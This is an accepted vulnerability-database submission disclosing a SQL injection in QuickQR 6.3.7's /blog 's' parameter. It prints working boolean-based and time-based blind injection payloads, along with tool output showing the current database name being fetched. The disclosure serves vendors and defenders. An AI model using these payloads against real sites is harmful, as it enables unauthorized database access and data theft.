Submit #179269: QuickQR 6.3.7 - SQL Injection

Title: QuickQR 6.3.7 - SQL Injection
Description:

# Exploit Title: QuickQR 6.3.7 - SQL Injection
# Date: 07/07/2023
# Exploit Author: skalvin aka (CraCkEr)
# Vendor: bylancer
# Vendor Homepage: https://bylancer.com/
# Software Link: https://quickqr.by-code.com/
# Version: 6.3.7
# Tested on: Windows 10 Pro
# Impact: Database Access

Release Notes:
SQL injection attacks can allow unauthorized access to sensitive data, modification of data, and crashing the application or making it unavailable, leading to lost revenue and damage to a company's reputation.

Path: /blog
https://website/blog?s=[SQLI]

GET parameter 's' is vulnerable to SQL Injection

---
Parameter: s (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: s=123') OR 05923=5923 OR ('04586'='4586

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (IF - comment)
    Payload: s=123'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z
---

[+] Starting the Attack
fetching current database
current database: 'quickqrmenu_**'
[-] Done
User: skalvin (UID 49463)
Submission: 07/07/2023 20:35 (3 years ago)
Moderation: 07/15/2023 18:26 (8 days later)
Status: Accepted
VulDB entry: 234235 [Bylancer QuickQR 6.3.7 GET Parameter /blog s sql injection]
Points: 17
